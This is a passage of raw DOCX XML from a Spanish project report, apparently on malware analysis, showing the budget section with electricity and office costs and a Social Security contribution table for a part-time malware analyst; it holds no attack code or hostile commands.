        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">con una utilización de 2,7 horas al día del dispositivo, se supone </w:t>
      </w:r>
      <w:r w:rsidR="00872652" w:rsidRPr="006F5182">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>que el</w:t>
      </w:r>
      <w:r w:rsidRPr="006F5182">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> consumo medio de</w:t>
      </w:r>
      <w:r w:rsidR="00872652" w:rsidRPr="006F5182">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>l ordenador elegido es de</w:t>
      </w:r>
      <w:r w:rsidRPr="006F5182">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> 70 vatios y un precio de 0,05 </w:t>
      </w:r>
      <w:r w:rsidRPr="006F5182">
        <w:t>€/</w:t>
      </w:r>
      <w:r w:rsidRPr="006F5182">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>kWh</w:t>
      </w:r>
      <w:r w:rsidR="006F5182" w:rsidRPr="006F5182">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, con lo que obtenemos un precio final para los 3 meses de </w:t>
      </w:r>
      <w:r w:rsidR="006F5182" w:rsidRPr="006F5182">
        <w:rPr>
          <w:rStyle w:val="q-box"/>
        </w:rPr>
        <w:t>12,15</w:t>
      </w:r>
      <w:r w:rsidR="006F5182" w:rsidRPr="006F5182">
        <w:t>€.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0DB913" w14:textId="2E7E51D4" w:rsidR="00790702" w:rsidRDefault="00790702" w:rsidP="004232C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Material de oficina: </w:t>
      </w:r>
      <w:r w:rsidRPr="00085BF9">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>gastos de material diverso como folios, bolígrafos y demás papelería suponen un gasto final de 15</w:t>
      </w:r>
      <w:r w:rsidRPr="00085BF9">
        <w:t>€.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0CA28" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3978247E" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Coste de recursos humanos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3749A7BC" w14:textId="59105C04" w:rsidR="00494899" w:rsidRDefault="006E49B4" w:rsidP="00494899">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Analista de malware: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D26AF4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dado que el analista es un ingeniero informático de formación, se aplicará</w:t>
      </w:r>
      <w:r w:rsidR="004E1567" w:rsidRPr="00D26AF4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>n las</w:t>
      </w:r>
      <w:r w:rsidR="00C15076" w:rsidRPr="00D26AF4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Base</w:t>
      </w:r>
      <w:r w:rsidR="004E1567" w:rsidRPr="00D26AF4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>s y tipos</w:t>
      </w:r>
      <w:r w:rsidR="00C15076" w:rsidRPr="00D26AF4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de Cotización de la Seguridad Social para 2024 para el grupo de “</w:t>
      </w:r>
      <w:r w:rsidR="00C15076" w:rsidRPr="00D26AF4">
        <w:t xml:space="preserve">Ingenieros y Licenciados” [X]. </w:t>
      </w:r>
      <w:r w:rsidR="00F03233" w:rsidRPr="00D26AF4">
        <w:t>Durante este proceso es impor</w:t>
      </w:r>
      <w:r w:rsidR="00D26AF4">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00F03233" w:rsidRPr="00D26AF4">
        <w:t xml:space="preserve">ante distinguir que se trata de un contrato a tiempo parcial. </w:t>
      </w:r>
      <w:r w:rsidR="00494899" w:rsidRPr="00D26AF4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>En primer lugar, los tipos de cotización aplicables serán los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="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66"/>
        <w:gridCol w:w="4137"/>
      </w:tblGrid>
      <w:tr w:rsidR="00420EE3" w14:paraId="7DC3AFC1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1431B1B5" w14:textId="74101822" w:rsidR="00F64DC9" w:rsidRDefault="00F64DC9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Tipo de cotización</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517B2EEA" w14:textId="42729296" w:rsidR="00F64DC9" w:rsidRDefault="002B1F61">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Porcentaje</w:t>
            </w:r>
            <w:r w:rsidR="00F64DC9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> (%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420EE3" w14:paraId="6FD9200F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="573A7CC4" w14:textId="592CF777" w:rsidR="00F64DC9" w:rsidRDefault="00F64DC9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Contingencias comunes del trabajador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D15C91" w14:textId="169E15A8" w:rsidR="00F64DC9" w:rsidRDefault="00D60F49">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>4,70</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420EE3" w14:paraId="1720237E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77AFC32D" w14:textId="6C39CB96" w:rsidR="00F64DC9" w:rsidRDefault="00F64DC9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Cuota de desempleo del trabajador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CDF8C8F" w14:textId="5F34A7E7" w:rsidR="00F64DC9" w:rsidRDefault="00A73683">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1,</w:t>
            </w:r>
            <w:r w:rsidR="005A344E">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>60</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420EE3" w14:paraId="50107DBC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46FE4E92" w14:textId="37838E25" w:rsidR="00F64DC9" w:rsidRDefault="00F64DC9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Cuota de formación del trabajador</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="251920EA" w14:textId="231239D9" w:rsidR="00F64DC9" w:rsidRDefault="00B83E13">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>0,10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420EE3" w14:paraId="2EA9A65B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23B46F23" w14:textId="1AB7F947" w:rsidR="00F64DC9" w:rsidRDefault="00F64DC9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Contingencias comunes de la empresa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C186363" w14:textId="3172F012" w:rsidR="00F64DC9" w:rsidRDefault="005C3730">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>23,60</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420EE3" w14:paraId="59CE8C68" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5FBF49" w14:textId="0BF12CA2" w:rsidR="00F64DC9" w:rsidRDefault="00F64DC9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Cuota de desempleo de la empresa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D3A1F46" w14:textId="68E59610" w:rsidR="00F64DC9" w:rsidRDefault="005A344E">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>6,70</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420EE3" w14:paraId="00753171" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63ED52A9" w14:textId="5B21E41C" w:rsidR="00F64DC9" w:rsidRDefault="00F64DC9">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Cuota de formación de la empresa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22891847" w14:textId="21489532" w:rsidR="00F64DC9" w:rsidRDefault="00126C94">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>0,60</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420EE3" w14:paraId="7E3257E8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AF660C4" w14:textId="0D9B60B0" w:rsidR="00F64DC9" w:rsidRDefault="00422FA7">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Fondo de Garantía Salarial (FOGASA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48EB1931" w14:textId="6D91E64E" w:rsidR="00F64DC9" w:rsidRDefault="000F59E2">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>0,20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE113B" w14:paraId="329AA1C8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="129FD37E" w14:textId="191E9D18" w:rsidR="00FE113B" w:rsidRDefault="00FE113B">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Accidentes de trabajo</w:t>
            </w:r>
            <w:r w:rsidR="004A04AD">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> y enfermedades profesionales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18814757" w14:textId="68C99D8F" w:rsidR="00FE113B" w:rsidRDefault="003E2FBF">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1,55</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE113B" w14:paraId="06A5015C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E10C190" w14:textId="1C6C17D8" w:rsidR="00FE113B" w:rsidRDefault="00FE113B">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03DE6A69" w14:textId="35A575FE" w:rsidR="00FE113B" w:rsidRDefault="00542582">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>39,05</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F605CA8" w14:textId="77777777" w:rsidR="00494899" w:rsidRPr="00494899" w:rsidRDefault="00494899" w:rsidP="00B74813">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="700"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DE2452E" w14:textId="0884B7BA" w:rsidR="006E49B4" w:rsidRDefault="0019701B" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0092637C">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Teniendo en cuenta que se trata de un contrato de trabajo a tiempo parcial, la base mínima horaria es de 11,13</w:t>
      </w:r>
      <w:r w:rsidRPr="0092637C">
        <w:t xml:space="preserve">€. Podemos suponer </w:t>
      </w:r>
      <w:r w:rsidR="00C54715">
        <w:t>para</w:t>
      </w:r>
      <w:r w:rsidRPr="0092637C">
        <w:t xml:space="preserve"> el caso de</w:t>
      </w:r>
      <w:r w:rsidR="003346FB" w:rsidRPr="0092637C">
        <w:t xml:space="preserve">l analista </w:t>
      </w:r>
      <w:r w:rsidR="009F67D8">
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidRPr="0092637C">
        <w:t xml:space="preserve"> nuestro proyecto</w:t>
      </w:r>
      <w:r w:rsidR="007E2ACC">
        <w:t xml:space="preserve"> que </w:t>
      </w:r>
      <w:r w:rsidR="0092637C">
        <w:t xml:space="preserve">su salario </w:t>
      </w:r>
      <w:r w:rsidRPr="0092637C">
        <w:t>ascenderá a 18€ por hora trabajada.</w:t>
      </w:r>
      <w:r w:rsidR="0092637C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C54715">
        <w:t>Aplicando las cuotas mencionadas previamente obtenemos los siguientes datos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297B1B18" w14:textId="77777777" w:rsidR="007E2ACC" w:rsidRPr="0092637C" w:rsidRDefault="007E2ACC" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>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0"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1801"/>
        <w:gridCol w:w="1801"/>
        <w:gridCol w:w="1801"/>
      </w:tblGrid>
      <w:tr w:rsidR="00420EE3" w14:paraId="73825AD3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="115457AA" w14:textId="026E7EC9" w:rsidR="006061F5" w:rsidRDefault="00B262BB">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Rol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BB3D7BE" w14:textId="5D9A8CD3" w:rsidR="006061F5" w:rsidRDefault="006061F5">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Horas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1801" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D687CB2" w14:textId="14B5E7D8" w:rsidR="006061F5" w:rsidRDefault="006061F5">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">Coste </w:t>
            </w:r>
            <w:r w:rsidR="009F7350">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>€/hora</w:t>
            </w:r>
            <w:r w:rsidR="009F7350">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1801" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C84AF6D" w14:textId="67F274AA" w:rsidR="006061F5" w:rsidRDefault="006061F5">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Coste</w:t>
            </w:r>
            <w:r w:rsidR="009F7350">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve">con </w:t>
            </w:r>
            <w:r w:rsidR="00F30946">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>cuotas</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> incluidas (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>€</w:t>
            </w:r>
            <w:r w:rsidR="009F7350">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/hora</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1801" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="694ABEB0" w14:textId="4947A36D" w:rsidR="006061F5" w:rsidRDefault="006061F5">
            <w:pPr>
              <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Total</w:t>
            </w:r>
            <w:r w:rsidR="00E1314B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="00E1314B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>€)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00420EE3" w14:paraId="17F01203" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
